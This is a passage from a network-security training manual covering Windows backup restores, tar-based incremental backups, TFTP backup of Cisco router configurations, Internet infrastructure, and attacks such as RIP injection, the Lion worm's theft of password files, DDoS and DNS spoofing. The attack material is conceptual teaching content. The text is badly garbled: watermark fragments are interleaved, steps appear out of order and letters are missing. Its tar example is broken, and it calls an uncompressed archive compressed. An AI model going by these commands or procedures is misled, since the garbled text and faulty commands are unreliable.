Browse to and open \BackReco\Incremental\Restore3 folder\Weekend_normal.bkf. In the left pane, expand File and the full path under the Media Created On File below it.
10. Click OK twice.
or
DO NO
Start the restore.
11. When the restore is complete, click Close.
ru ct In
14. Verify that the Weekend.txt le has been restored. 15. Switch to the Backup utility.
16. On the Restore tab, delete the existing media catalog. 17. Catalog the Tue_incr.bkf backup le. 18. In the left pane, expand File and the full path under the Media Created On File below it. 19. Check the Backup3 folder. 20. Start the restore. 21. Click OK twice. 22. When the restore is complete, click Close. 23. Minimize the Backup utility.
st
DU
13. Switch to Windows Explorer, and select the BackReco\Incremental\ Backup3 folder.
PL
IC
AT
Check the Backup3 folder.
Ed
iti
on
24. Switch to Windows Explorer, and select the BackReco\Incremental\ Backup3 folder. 25. Observe that only the Tuesday.txt le was restored. The Monday.txt le is still missing.
Analyzing the Incremental Restore

What happened just now? When choosing to restore from an incremental backup set, in order to fully restore all of the les, you must start with the rst (normal) backup and then proceed to restore from every subsequent incremental archive.
OPTIONAL TASK 6D-22

Completely Restoring from Incremental Backup
Setup: You are logged on to Windows 2000 as the renamed Administrator account, and Windows Explorer and the Backup utility are running. 1. 2. 3. 4. 5. 6. 7. 8. 9. Highlight the two text les in this folder, and delete them. Leave this Explorer window open. Switch to the Backup utility.
Ed
T DU PL IC
Delete the media catalog, catalog the Weekend_normal.bkf le, and restore from that le.
In the Backup utility, delete the media catalog, catalog the Mon_incr.bkf backup le, and restore from that le. In Explorer, verify that the Monday.txt le has been restored.
Close the Backup utility.
11. Close Explorer.
Backup Options for Linux Computers

Strategies for backup up in Linux are the same as with any other OS; you still choose between normal, differential, or incremental backups. Most administrators typically would still use home-grown solutions based off tar or cpio to back up their les, as these facilities are built in to the OS.
In
DO
10. In Explorer, verify that the Tuesday.txt le has been restored. You now have correctly restored all of the les from the incremental backup set.
st
NO
In the Backup utility, delete the media catalog, catalog the Tue_incr.bkf backup le, and restore from that le.
ru ct
In Explorer, verify that the Weekend.txt le has been restored.
or
AT
iti
on
Some third-party and commercial utilities available for Linux include: Lone Tar (from www.cactus.com) Afbackup (from http://sourceforge.net/projects/afbackup) Arkeia (from www.arkeia.com), an enterprise backup system. Incidentally, while Arkeia for the enterprise has a price tag to it, Arkeia-Lite for one Linux server with two clients is free. Amanda (from www.amanda.org), a comprehensive network backup system. The Advanced Maryland Automatic Network Disk Archiver, as the name implies, was developed at the University of Maryland. AMANDA can be used as a network backup system. It enables a LAN administrator to set up a server as a master backup server. Using this server, the administrator can back up multiple hosts to a single large-capacity tape drive. AMANDA uses the native dump and/or GNU tar facilities to back up many workstations on the network even if they run different versions of Unix or Linux. The new versions of AMANDA can also use SAMBA to back up Windows workstations.
Current Products that Can be Used for Backup

The GNU tar utility is an abbreviation for Tape Archive and is the traditional way Unix machines used to create archives on tape as a backup and recovery mechanism. When you are backing up to a device, you have to specify the device by name, such as: Floppy disk: /dev/fd0 Lets say you wanted to back some les (le1, le2, and le3) to a oppy disk. If the les are larger than a single oppy, then you want the archiving software to span it across multiple oppies. In this case, you would use the tar command as follows:
Ed
T DU
or
DO NO
SCSI tape drive: /dev/st0
In
416
st
ru ct
-z = zip the le -M = multi-volume
tar -cfzM /dev/fd0 file1 file2 file3
If you read the man pages for tar, you will see that the switches work as follows: -c = create -f = archive (name of the archive le or location)
If you just wanted to create an archive of two les (abc.txt and def.txt) to a single le called abcdef.tar on your hard drive, you could, for example, use the following command:
tar -cf abcdef.tar abc.txt def.txt
Another useful command to know is the nd command. This command, with the appropriate switches, can be used to nd les that were created or modied in the last day, as shown here:
find -mtime -1 -type f -print
If you were to run the tar routine and, instead of specifying individual les, you enclosed this nd command in single back quotes, the result of the nd command would be tarred. (The single back quote on a U.S.-International keyboard is to the left of the numeral 1. The single quote thats to the right of the semi-colon is not the one we want.)
PL
IC
AT
iti
on
So, if you were scheduling an incremental backup every day, you would, on the rst day, tar all the les you wanted to archive (maybe to a tape); then, on subsequent days, you would tell tar to archive only those les that changed on that day.
TASK 6D-23
Using the tar Command for Incremental Backups
Setup: You are logged on to Windows 2000 as the renamed Administrator account. 1. 2. 3. 4. 5. Log in to Linux as root, and open a Terminal Window.
Create a directory called tartest, and then change to that directory. Enter touch abc.txt to create a le. Enter touch def.txt to create another le.
Enter nd -mtime -1 -type f -print to nd les that have been created or changed within the last day. You should be shown a list of the two les you just created.
Ed
T DU PL IC
7.
Verify that the new tar le was created, and close the Terminal Window.
Backup Strategies for Cisco Routers
Cisco has a tftp server available for use on a Windows 9x/NT machine from their Web site at www.cisco.com/pcgi-bin/tablebuild.pl/tftp. You must accept the Software License Agreement before downloading the tftp server software. Other tftp servers are also available, such as the one from the Solarwinds Web site. Of course, you can simply implement the Remote Installation Service (RIS) for Windows 2000, then turn on the tftp daemon service to make your Windows 2000 Server into a tftp server, but this will work only on Windows 2000 Server. In order to implement the full-edged RIS, you must have a Windows 2000 domain, but for the purposes of this exercise it does not matterwe just need RIS to be able to include the tftp service.
st
In
DO
NO
Earlier in the Cisco router lesson, you looked at router conguration information. A routers running conguration is saved to a ash le, which is usually named running_cong. These conguration les are typically uploaded to or retrieved from tftp servers somewhere on the network. A lot of work goes into conguring a production router. These conguration les, including any access lists, can be considered to be sensitive information. As such, this information should be backed up to removable media and stored in a secure location. The typical method of backing up a conguration le is to upload it to a tftp server.
ru ct
or
AT
6.
Enter tar -cf abcdef.tar `nd -mtime -1 -type f -print` to tar the results of the nd command. Remember that both of the quotes need to be back single quotes. A compressed tar le called abcdef.tar will be created for you.
iti
Make sure that you type the numeral 1 (not the letter l) for the second argument.
on
417
TASK 6D-24
1. 2. 3. 4. 5. 6. 7. 8. 9.
Log on to Windows 2000 Server as the renamed Administrator account. Open the Add/Remove Programs Control Panel. Click Add/Remove Windows Components, and wait for a few seconds. Scroll down the list, check Remote Installation Services, and click Next.
ru ct st In
If you need to create user accounts for students, use the username command in a console session.
10. Right-click this service, and choose Start.
12. Open Windows Explorer.
14. Open a command prompt, and enter netstat -a to verify that your machine has its UDP port open for tftp. You have just set up a tftp server.
15. Telnet to your router, or use SSH, if it is enabled. 16. Switch to Enable Mode. 17. Enter copy ru tftp to begin copying the conguration le.
418
DO
13. Expand your boot partition. You should see a folder called tftpdroot. Double-click this folder. This is the folder where anyone tftp-ing to your server would place their les. Leave Explorer open.
NO
11. Close the Services console.
DU
In the right pane, scroll down and look for the Trivial FTP Daemon Service.
PL
From the Start menu, choose ProgramsAdministrative ToolsServices.
IC
Click Finish, and then click Yes to restart the computer. Then, log back on to Windows 2000 as the renamed Administrator account.
or
Click OK.
AT
When prompted, provide the path to the Windows 2000 installation les.
Ed
iti
Backing Up Cisco Router Configurations
on
PGP: (Pretty Good Privacy) A freeware program primarily for secure electronic mail.
Once you have a tftp server, you can issue the appropriate commands on the Cisco router to upload its conguration information to the tftp server. After the le is uploaded, you can take it off the server and put it on a oppy disk for safekeeping. If you want to make this information more secure, you can encrypt the le by using PGP or any other encrypting tool. For the purposes of the subsequent tasks, you will implement the built in tftp solution in Windows 2000 Server.
18. When prompted for the address or name of the remote host, enter your computers IP address. Next, you will be prompted for a destination le name. 19. Press Enter to accept the default le name.
21. Close the remote router session. 22. Switch to Explorer. 23. Verify that there is a le called left-cong (or right-cong, as the case may be) in the tftpdroot folder.
Ed
T DU PL IC
24. Double-click this le and open it in Wordpad. You can see the routers entire conguration in this le. In a production environment, you would protect this le very carefully by moving it over to removable media and storing the media in a safe place.
Lesson Review
6A Broadly speaking, what are the two types of disasters that can affect a business?
st
Natural disasters and man-made disasters.
List the two basic parts to a quantitative risk analysis. The probability of a threat occurring and the estimated loss that will result from the threat.
6B What must be undertaken by a company before creating a contingency plan?

A risk analysis.
In
Before a contingency plan is put to effect, what must be done? It must be tested.
DO
ru ct
In this lesson, you looked at various types of disasters that could befall an organization and put it out of commissionunless the organization had already implemented some form of business continuity planning. You looked at how such plans could be developed and tested. You looked at technologies to keep you powered on, backup strategies for operating systems, and products that can be used in various situations.
NO
or
AT
Summary
iti
on
20. Wait a few seconds, and your conguration will be copied over to the tftp server.
What are the three types of tests that are typically carried out on a contingency plan? Simulated testing on paper (or check list test). Limited environment simulation (or structured walk-through test). Full scale environment simulation (or full interruption test).
6C Voltage stabilizers can be used to combat what kind of electrical disturbances?

Spikes, surges, and sags.
Generators can be used to combat what kind of electrical disturbances? Blackouts.
List at least three fuel types for conventional combustion-type electrical generators (other than diesel, propane, kerosene, and gasoline).
6D What are the minimum number of disks required to implement RAID 5?

Three.
List some of the requirements for a hot site:
or
DO NO
ru ct
Broadly speaking, what are the three types of backups implemented by most system administrators? Normal, differential, and incremental. The Archive bit is the sixth bit in the attribute byte. What is the essential difference between a differential backup and an incremental backup? A differential backup does not mark the backed-up les as archived, while the incremental backup does.
In
st
DU
The company uptime at the hot site should be achieved in a matter of hours, not days.
PL
Responses might include: Hot sites are practically a working replica of your server and client congurations.
IC
AT
50 percent.
What is the disk-utilization percentage for RAID 10?
Ed
Responses might include CNG, LNG, methanol, and ethanol.
iti
on
Overview
In this lesson, you will learn how to identify the issues associated with Internet and World Wide Web security. You will detail the major components of the Internet and their functions. Following a look at the components of the Internet, you will examine how hackers attack these components and how they target Web sites. The lesson ends by detailing the areas of Internet security that are related to individual users.
Objectives
In this lesson, you will: 7A Identify the major components of the Internet.
Ed
T DU PL IC
In this topic, you will identify the pieces of the Internet that are actually used to run the Internet and the organizations that govern them. 7B Examine the attacks used against Web servers.
7C
Identify the attack points on the Internet.
In this topic, you will identify the areas of the Internet where attacks have the highest probability and what those attacks are likely to be.
In this topic, you will identify the techniques used to attack the users of the Internet, in contrast to attacks against the Internet itself.
st
In
DO
NO
7D
Identify risks that the Internet user faces.
ru ct
In this topic, you will examine the techniques used in attacks on Web servers and Web sites.
or
Lesson 7: Security on the Internet and the WWW 421
AT
iti
on
Data Files simple.htm
Security on the Internet and the WWW
LESSON
Lesson Time 4 hours
Topic 7A
Describing the Components of the Internet
The Internet Backbone itself is a very high-speed connection of networks and has three major components: Network Service Providers, Long Distance Carriers, and Network Access Points.
or
DO NO
The U.S. Portion of the Internet Backbone
ru ct
In
st
Figure 7-1: A graphical representation of the Backbone over the United States. Picture courtesy of the National Center for Supercomputing Applications (NCSA).
DU
PL
IC
AT
Components of the Internet Backbone
Two excellent Web sites that attempt to explain and illustrate the physical aspects of the Internet, along with myriad other issues surrounding the Internets history and future, are: www.cybergeography.com/ and www.telegeography.com/.
Ed
We know it as the Internet and the World Wide Web. The Internet is loosely dened by some as a packet-switched network of networks, not owned by any one country, government, or organization; rather, it is a voluntary use network. The physical layer of the internet itself involves many types of physical media (wired and wireless), and therefore, many types of access methods.
iti
The Backbone (or Layer 1 of the Internet)
on
For us to have a valid discussion about the Internet and the World Wide Web, it is critical that you have solid knowledge of the components of the Internet. The major components that we will discuss are the Backbone and NAPs (Network Access Points), ISPs (Internet Service Providers), and DNS (Domain Name Service).
Network Service Providers (NSPs)

Network Service Providers, sometimes called peering centers, are the actual organizations that provide the foundation level of the Internet Backbone. An NSP will provide national or international interconnecting Internet services to Regional Network Providers and to large Internet Service Providers, via Network Access Points. There are guidelines to be met for an organization to be considered an NSP, such as: Minimum DS-3 Bandwidth rates. Three interconnection points to NAPs. Routing of both ISO 8473 (CLNP) and IP packets.
ru ct
Hughes Network Systems provides backbone bandwidth via satellite communication.
NAPs
st
AmeriTech Advanced Data Services, located in Chicago, IL. MFS Communications, located in:
In
Washington, DC San Jose, CA Dallas, TX
Frankfurt, Germany Paris, France
PacBell, located in:

DO
NAPs (Network Access Points) provide the actual means for the ISPs and NSPs to interconnect. The restrictions of traffic ow are only those that are the result of restrictions between the ISPs and NSPs (or legal requirements). ISPs and NSPs are required to have at least one bilateral agreement with a different ISP or NSP in order to attach to the NAP. In the United States, there are six major NAPs, known as Priority Network Access Points, and other non-priority NAPs: Sprint, located in Pennsauken, NJ.
NO
DU
PL
IC
WorldCom International, a division of MCI WorldCom, uses a ber and digital microwave network to provide DS-1 and DS-3 speeds.
or
Sprint provides DS-1 and DS-3 speeds on its primarily ber network. Sprint also uses FDDI for router interconnection.
AT
The Long Distance Carriers are the providers of the physical network of communication channels for the Internet and voice/data applications. The general method would be for a NAP to contract with a Long Distance Carrier to provide the channels for backbone communication. Four major LDCs are listed below: ATT uses Frame Relay circuits at both DS-1 and DS-3 speeds, along with a hybrid Asynchronous Transfer Mode (ATM) network.
Ed
Long Distance Carriers
iti
Service availability of 99.92 percent uptime, with further requirements of no more than 7 hours per year outage and time to service restoration of 2.5 hours.
on
Los Angeles, CA San Francisco, CA
Federal Internet Exchange, known as FIX-West. Digital Internet Exchange, located in Palo Alto, CA.
ISPs at Work
ISP Classications
Tier One: These ISPs have their own nationwide backbone and connect to a NAP. They also have over 1,000,000 subscribers. Tier Two: These ISPs obtain their bandwidth from Tier One and have a local or regional backbone network. They have 50,000 subscribers and provide state or national service.
Ed
T DU
Clearly, not every ISP can have a direct connection to the Backbone; there would be too many connections, and the overall efficiency of the Internet would suffer greatly. Instead, there is a tiered system, where one ISP feeds off another. There are three levels of ISP generally classied as follows:
or
DO NO
In
424
st
ru ct
ISP Tiers
Figure 7-2: A graphical representation of the ISP tier system and connections.
PL
IC
Tier Three: These ISPs obtain their bandwidth from Tier Two and would provide local services only. They generally will have fewer than 50,000 users.
AT
Just to be clear, there are no industry-agreed-upon guidelines on tier classication; these are for reference only.
iti
When it comes to actual users connecting to the Internet, they need some type of local access. This is where the whole ISP (Internet Service Provider) system comes into focus. A common analogy for ISPs is that they are the providers of the dial tone for the Internet. With the ever-present mergers and acquisitions of ISPs, it is hard to keep up with all of the players. Instead, we will quickly look at the ISP system.
on
The Organizations that Help Run the Internet (or Layer 8 of the Internet)
For the Internet, there is no single management authority; instead, there are several groups involved in the infrastructure and management of the Internet. These organizations work together to ensure that the Internet remains operational and functions at the highest levels of available efficiency. The following are the main groups: Internet Engineering Task Force (IETF). The IETF is a large open international community of network designers, operators, vendors, and researchers concerned with the evolution of the Internet architecture and the smooth operation of the Internet. It is open to any interested individual.
Internet Society (ISOC). The ISOC is a non-prot and nongovernmental professional organization that coordinates the usage of Internet applications and protocols. Membership to the ISOC is required.
st
In
The chart shown in Figure 7-3 will help you understand the position of these different organizations according to the roles they play.
The ICANN Organizational Chart
DO
Network Information Centers (NIC). The NICs around the globe are organizations that perform Registry and Registrar functions associated with Domain Names.
NO
Council of Registrars (CORE). The CORE provides the international framework in which the policies for administration and enhancement of the Internet Domain Name Service are developed and implemented.
DU
Internet Engineering Steering Group (IESG). The IESG is responsible for technical management of IETF activities and the Internet standards process. The IESG is directly responsible for the actions associated with entry into and movement along the Internet standards track, including nal approval of specications as Internet standards.
ru ct
PL
The Internet Corporation for Assigned Names and Numbers (ICANN). The ICANN, a non-prot corporation formed in 1998, presently assumes the following responsibilities: the IP address space allocation, protocol parameter assignment, DNS and root server system management, as well as management functions previously performed under U.S. Government contract by IANA and other entities.
or
IC
AT
Internet Assigned Numbers Authority (IANA). The IANA, operating out of the University of Southern California, is chartered by the ISOC and the Federal Networking Council to function as the central coordinator for the assignment of IP addresses and management of the Root Domain Name Service.
Ed
Internet Architecture Board (IAB). The IAB is responsible for dening the overall architecture of the Internet, providing guidance and broad direction to the IETF. The IAB also serves as the technology advisory group to the ISOC and oversees a number of critical activities in support of the Internet.
iti
on
Organizations that Help Run the Internet
Ed or ru ct
DNS Revealed
Figure 7-3: ICANN organizational chart.
st
426
In
DO
Simple connection via an ISP may be enough to use the Internet, but for most users, they also want to experience the World Wide Web. Because the Web uses names, and the Internet uses numbers, there must be a translation between the two at some point along the way. This is where DNS comes in. Using at-le databases maintained in Domain Name Servers around the world, users can browse around using names instead of numbers.
NO
DU
PL
IC
AT
iti
on
RIPE: The Reseais IP Europeens operates in North Africa and Europe. APNIC: The Asia-Pacic Network Information Center operates in Asia and Australia.
Ed
Figure 7-5 shows the physical locations of the Root DNS servers on the Internet.
ru ct st In
PL
IC
Mapping the DNS Root Servers
Figure 7-4: A table of the Root DNS servers on the Internet.
Figure 7-5: A map showing the physical locations of the Root DNS servers. Image from the World Internetworking Alliance (WIA), www.wia.org.
DO
NO
DU
or
AT
iti
The DNS servers that provide the top level of name resolution are called the Root servers. There are currently 13 Root level DNS servers. Their names, locations, and IP addresses are shown in Figure 7-4.
on
DNS Root Servers
The organization that keeps track of all of the names and numbers associated with DNS is IANA. IANA acts as the central coordinator for assignment of IP addresses and manages the Root Domain Name Service. Additionally, there are three regional organizations around the world that assign IP addresses: ARIN: The American Registry for Internet Numbers operates in the Americas and sub-Saharan Africa.
TASK 7A-1
1. 2.
Discuss, with at least one other student, the principles of the Internet design. After your discussion, diagram as much of the physical layout of the Internet as possible. Make your diagram as detailed as possible, including as many components as you can think of, only using this text for reference when necessary.
Ed
T DU
Defining Internet Components
st
In
This is similar to the difficult issue of securing the infrastructure of the Internet. There are so many revolving doors, so to speak, that can become broken. It may not be necessary to actually get inside to be able to damage a mission-critical system.
428
DO
hacking: Unauthorized use, or attempts to circumvent or bypass the security mechanisms of an information system or network.
ru ct
Identifying the Weak Points of the Internet

So if the Internet servers are so well secured, and the ISP/NAP combinations have at least three connection points, the redundancy of the Internet seems to, by design, make hacking it a difficult task. To some this may be true, but to others it presents a challenge. So, where would a hacker attack? At what point is the Internet itself vulnerable? Hackers have several options, none of which are as easy as targeting a neighbor or small business down the street. Options of attack become the infrastructure itself, instead of a particular host or network. Imagine this: There is a person who is trying to damage business X, a retail business. Business X has solid physical security inside, and people shop there no matter how loudly this person yells at them to stop. Out of frustration, one day he goes into the revolving door of business X and jams it so that it cannot revolve. He does this to all three revolving doors until there is no way in or out of business X. Did he compromise any internal systems, or even attempt to break into them? Not one. Has he damaged the business? Absolutely.
NO
PL
IC
Topic 7B
or
AT
iti
on
fault tolerance: The ability of a system or component to continue normal operation despite the presence of hardware or software faults.
These Root servers are perhaps the most important systems today on the Internet. Root Servers A through M are maintained under control of the U.S. government. To prevent a single hacker exploit from compromising the entire system, the Root servers run different variations of UNIX as their operating systems. So critical is proper DNS operation to the global economy that most of these locations are secured under strict access methods, coupled with military-level control and armed guards present at all times. Recent attacks (as the one in October 2002) via the Internet to try and cripple these servers failed to have a signicant impact on the Internet because of the built-in redundancy. To increase fault tolerance, discussions are under way to populate the Internet with a few more Root servers, hosted in the Asia-Pacic region. To begin the process, Root Server F in California will be mirrored to a location in Asia so as to reach the largest possible Internet base of users.
Targeting the Routers

One of the potential targets of the Internet is the physical routers. These are the devices that carry the network information on the Backbone of the Internet. The Backbone routers function in a slightly different way from the everyday routers used in most organizations. The Backbone routers can be considered defaultless core routers, due to the fact that they do not hold any default routing data. Instead, Backbone routers use BGP (Border Gateway Protocol) to learn new routes dynamically. If an owner of an IP address changes local ISPs, the routes to this owner change. Most Backbone routers will accept BGP messages only from the largest Tier One ISPs. In the event that a Backbone router is found that will accept BGP information, this is where a hacker will attempt to inject false routing data into the tables. If the hacker is unable to inject false routing data, he or she may result to DoS (Denial of Service) for the simple task of preventing the router from operating fully as designed.
Ed
T DU PL IC
An easier place for router attacks is not on the Internet itself, but in the local network routers. If a router is using RIP (Routing Information Protocol), a hacker can inject data into the routing tables with ease. RIP uses UDP packets for exchange of data and does not have any authentication mechanism built in. This means that any attacker can inject false routes into the routing tables. The false routes will then be propagated around the RIP network.
st
Figure 7-6: An example of some of the locations from which a hacker can inject RIP updates into a network.
In
DO
ru ct
NO
or
AT
iti
Vulnerable Locations for RIP Injections
on
Targeting the ISPs

The way for a hacker to reach the maximum number of potential targets in the fastest amount of time is to hack into an ISP. By compromising an ISP, a hacker can have access to thousands of targets almost at once. This potential is overwhelming for some hackers, thus the ISP is their primary target. Often the hacker will not be trying to actually do any damage to the ISP itself, and he will try to remain as unnoticed as possible. The hacker is interested only in the user data. User names, passwords, and IP addresses can be compromised.
Targeting DNS
The Lion Worm
ru ct
In
rootkit: A hacker security tool that captures passwords and message trafc to and from a computer. A collection of tools that allows a hacker to provide a back door into a system, collect information on other systems on the network, mask the fact that the system is compromised, and much more. Rootkit is a classic example of Trojan Horse software. Rootkit is available for a wide range of operating systems.
The Lion worm was distributed via an application called pscan. randb would follow by generating random class B networks, probing TCP port 53. After a system was targeted, it would next check to see if that system was vulnerable. In the event that a vulnerable system was identied, a system exploit was executed, and the t0rn rootkit was installed. Once the rootkit was installed, it sent off the contents of /etc/passwd and /etc/ shadow, along with some network settings, to an address in the china.com domain. It would then delete /etc/hosts.deny, lowering some of the built-in protection afforded by TCP wrappers. Ports 60008/tcp and 33567/tcp were given a backdoor root shell (via inetd, see /etc/inetd.conf), and a Trojaned version of SSH would be placed on 33568/tcp. Syslogd would then be killed, so the logging on the system could no longer be considered trusted. To continue, a Trojaned version of login would then be installed. The Trojan would enable looking for a hashed password in /etc/ttyhash. /usr/sbin/nscd (the optional Name Service Caching daemon) would nally be overwritten with a Trojaned version of SSH. So, does this strike you as a serious threat? It better! All of this would be possible, simply by locating DNS servers running the correct versions of BIND. This is an example of attacking the infrastructure directly.
st
430
DO
NO
DU
PL
The Lion worm is very similar to a different worm named Ramen; however, Lion was much more dangerous and needed to be taken seriously. It infected Linux machines with the BIND DNS server running. The BIND versions that were affected were 8.2, 8.2-P1, 8.2.1, and 8.2.2-Px, but BIND 8.2.3-REL and BIND 9 were not vulnerable.
or
IC
probe: Any effort to gather information about a machine or its users for the apparent purpose of gaining unauthorized access to the system at a later date.
AT
On that day in March, IDS sensors all over the world were picking up massive requests to port 53 (DNS). A worm was soon found, named Lion, which used the BIND hole to attack the DNS servers. One single regional analysis of port 53 probes saw the number jump from 200 probes per day, prior to March 22, up to 50,000 probes on that day.
Ed
This is perhaps the biggest risk area of the Internet. Not technically a single point of failure, since the Root DNS servers run different versions of their operating systems on various hardware platforms in various physical locations, but nevertheless a strong target. There have been many issues of vulnerabilities with DNS over the years, with one of the most current being the BIND (Berkley Internet Name Domain) attacks starting March 22, 2001.
iti
on
DDoS of the Internet

Instead of launching a specic attack against the DNS system, a hacker can target DNS via a DDoS (Distributed Denial of Service). By launching a DDoS attack against DNS servers, no true data can be exchanged. The end result of this is that DNS servers will not be able to update their DNS entries, and host-name resolution may cease for those servers clients.
DDoS takes advantage of the inherent communication channels of the Internet. In order for us to communicate, we must have open channels. If those channels were to ll with useless information, then when we need to communicate, there would be no open channels to do so. This is essentially the function of DDoS. One of the main tools used in DDoS attacks is called TFN2K, or Tribe Flood Network 2000. TFN2K has the ability to ood the network with TCP, UDP, or ICMP packets (or a mix of all three at the same time). Additionally, TFN2K can spoof the source IP address, making for difficult investigative work in response to an attack. If a hacker is going to go after the serious infrastructure of the Internet, there is no better choice than DNS itself.
Ed
T DU PL IC
st
Figure 7-7: A graphical example of the position of elements for a simple DoS attack.
In
DO
ru ct
NO
or
AT
iti
Denial of Service Attack Locations
on
TASK 7B-1
Identifying Weak Points of the Internet
1.
2.
List the possible attack points and methods you have dened.
Because the DNS servers are perhaps the most critical component of the Internet, their security is paramount. There are several different areas in which attackers commonly will go after a DNS server. They are pulling Zone Transfer traffic and DNS Spoong.
Zone Transfers
When it comes to DNS and security on the Internet, one of the rst issues to address is the issue of Zone Transfer traffic. Zone Transfer traffc is the name of the data sent from a DNS server that is responsible for an area, or zone, to a secondary server that will assist with name resolution. The reason this is critical, from a security perspective, is that in this transfer trafc are names of computers and their IP addresses. Additionally, depending on the conguration of the master DNS server, the data is likely to include the type of machine, such as a mail server. So, if an attacker is trying to identify the targets in a particular network, the zone transfer traffic may identify all the machines.
Ed
T DU
or
DO NO
432
In
st
ru ct
Where this is most important is the DNS server that provides name resolution to both public and private addresses. In the event an attacker is able to get the zone transfer traffic of this DNS server, the attacker will have the entire internal network mapped, by hostname, IP address, and some services. There are two basic types of Zone Transfer traffic. The rst is called All-zone, and this transfer is when all the names that the master DNS server is aware of are sent to the secondary DNS serverin other words, everything the DNS server knows about name resolution. In the DNS server, this is called an AXFR transfer. The second type of transfer is called an Incremental transfer. The Incremental transfer, instead of containing all that a DNS server knows, will contain only that information that is new or changed since the last transfer. This is a more efficient way of exchanging zone data. In the DNS server, this is called an IXFR transfer. So an attacker may pretend to be a legitimate secondary DNS server and request the master DNS to transfer the zone information. For this reason, it is strongly advised that all master DNS servers are congured to allow transfer traffic to go only to authorized secondary DNS servers.
PL
IC
AT
iti
DNS Security
on
Using your diagram from Task 7A-1 for reference, identify the points of attack of the Internet, and the methodologies that could be used to attack these points.
DNS Spoofing
Companies that do all of their business on the Internet must be vigilant in the protection of their Web sites. However, for most organizations, the ability to protect the Web site stops at the Web site. Generally, the organization does not have control over the ISP, the routers, or the DNS of the Internet. What would happen if the DNS server that is used to identify the organizational Web site were to suddenly point to the wrong Web site? This type of thing has happened, and it is something that an organization must watch out for. The ability to redirect a DNS server to point a client to an incorrect resource is very serious. Imagine that an attacker had taken the time to pull every page from the organizations Web site, could re-create the site in its entirety, and was to redirect legitimate requests for this Web site to the cloned site that the attacker is running. If this Web site takes credit card numbers, it becomes a very serious situation. There are several different methods of DNS spoong: DNS Cache Poisoning. In DNS Cache Poisoning, an attacker sends fake mapping information to the DNS server, and the server enters this false name information as legitimate DNS data. When a client asks the DNS server to resolve a name that has been falsely entered in the DNS server, there is no way for the client to know that the information is incorrect. By doing this, the attacker is able to send the client to an incorrect machine. Spoong the DNS Response. In Spoong the DNS Response, the attacker sits between the DNS client and the legitimate DNS server. When the attacker notices a DNS request on the wire, a false response is sent to the client (from the attacker) before the legitimate DNS server can reply. By doing this, the attacker is sending the client to an incorrect machine.
Ed
T DU PL IC
The danger of a DNS server that has been compromised, combined with a duplicated Web site that requests credit card data, should be very obvious by now. One thing to maintain, as an organization, is careful logging and monitoring of Web traffic. In the event that all traffic stops, this may be cause for alarm.
Configuring DNS for Windows 2000
In
In the following set of tasks, you will install and congure DNS servers. First, your instructor will congure a DNS server on the instructor machine. This will be the Standard Primary Server. Watch the steps carefully as the instructor performs them. Next, the instructor will create Reverse Lookup Zones for the Left, Center, and Right subnets, matching the subnets in your classroom layout. Your instructor will also create one Forward Lookup Zone called scnpdns.edu for the whole class. You will later congure your machines to be Secondary DNS Servers to this Primary Server.
st
DO
ru ct
DNS Server Compromise. The third spoong option is for complete DNS Server Compromise. In this case, the attacker has taken control of a legitimate DNS server and has directly inputted false data. The client makes a DNS request to the server, and the server replies just as it is designed to do.
NO
or
AT
iti
DNS spoong: Assuming the DNS name of another system by either corrupting the name service cache of a victim system, or by compromising a domain name server for a valid domain.
on
INSTRUCTOR TASK 7B-2

Installing a Standard Primary DNS Server on a Windows 2000 Server
1. 2.
If necessary, log on to Windows 2000 Server as Administrator.
Congure the nameserver lookup for the network interface 172.17.10.1 to be 172.17.10.1. To do this, right-click My Network Places, and choose Properties. Rightclick the Ethernet interface for 172.17.10.1, and choose Properties. Double-click Internet Protocol (TCP/IP). Select Use The Following DNS Server Addresses, and enter 172.17.10.1. Then click OK twice.
3. 4. 5. 6.
From the Network And Dial-up Connections Control Panel menu, choose AdvancedOptional Networking Components. In the Components window, highlight, but do not check, Networking Services and click the Details button. Check DNS and click OK.
Ed
T DU
or
DO NO
434
In
st
ru ct
Reverse Lookup Zones
Now your instructor will create Reverse Lookup Zones for the Left, Center, and Right to match the subnets, just the way your class is laid out. Your instructor will also congure Zone Transfer properties for selective transfers. There is no particular reason for creating Reverse Lookup Zone(s) rst and then the Forward Lookup Zone(s). Its just that, by creating a Reverse Lookup Zone rst, you are indicating an awareness of the various subnets that make up your network. This will lead to a more streamlined approach if you create host records via dynamic DNS (DDNS)their associated reverse lookup records will be automatically created and placed in their appropriate zones. Even when you are manually creating host records, if you check the option to simultaneously create a reverse lookup record, the reverse lookup record will automatically be placed in the appropriate zone.
PL
IC
Click Next, point to the location of your Windows 2000 Servers i386 installation les, click Open, and click OK. You now have the DNS server installed on your machine.
AT
iti
on
Setup: Your instructor will perform this task on the instructor machine.

Creating Reverse Lookup Zones
1. 2. 3. 4. 5. 6. 7. 8.
From the Start menu, choose ProgramsAdministrative ToolsDNS. Expand INS-W2K-C01, select and right-click Reverse Lookup Zones, and choose New Zone. Click Next, verify that Standard Primary is selected, and click Next. For Network ID, enter 172.16.10. Click Next twice, then click Finish.
Create Reverse Lookup Zones for the 172.17.10 and 172.18.10 zones. Use the steps above as a guide. Expand the Reverse Lookup Zones folder. Select and right-click the Reverse Lookup Zone 172.16.10.x Subnet, and choose Properties.
or
DO NO
9.
Click OK.
12. Select and right-click the Reverse Lookup Zone 172.18.10.x, and choose Properties. 13. Select the Zone Transfers tab, leave Allow Zone Transfers checked, but select the radio button next to Only To The Following Servers, and add the IP addresses for all student machines that are on the 172.18.10.x subnet. 14. Click OK.
Now, your instructor will create a Forward Lookup Zone for the whole class. Your instructor will also congure Zone Transfer properties for selected transfers.
In
Forward Lookup Zones
st
DU
11. Select the Zone Transfers tab, uncheck Allow Zone Transfers. Click OK.
ru ct
PL
10. Select and right-click the Reverse Lookup Zone 172.17.10.x Subnet, and choose Properties.
IC
AT
Select the Zone Transfers tab, leave Allow Zone Transfers checked, but select the radio button next to Only To The Following Servers, and add the IP addresses for all student machines that are on the 172.16.10.x subnet.
Ed
iti
on

Creating a Forward Lookup Zone
1. 2. 3. 4. 5. 6.
Select and right-click Forward Lookup Zones, and choose New Zone. Click Next, verify that Standard Primary is selected, and click Next. For Zone Name, enter scnpdns.edu. Click Next twice, and then click Finish.
Expand Forward Lookup Zones, then select and right-click scnpdns.edu, and choose Properties. Select the Zone Transfers tab, leave Allow Zone Transfers checked, but select the radio button next to Only To The Following Servers, and enter the IP addresses for all student machines that are on the 172.16.10.x and 172.18.10.x subnets. Click OK.
7. 8. 9.
Ed
T DU
If necessary, select the Zone you just created.
Right-click anywhere in the right pane, and choose New Host.
st
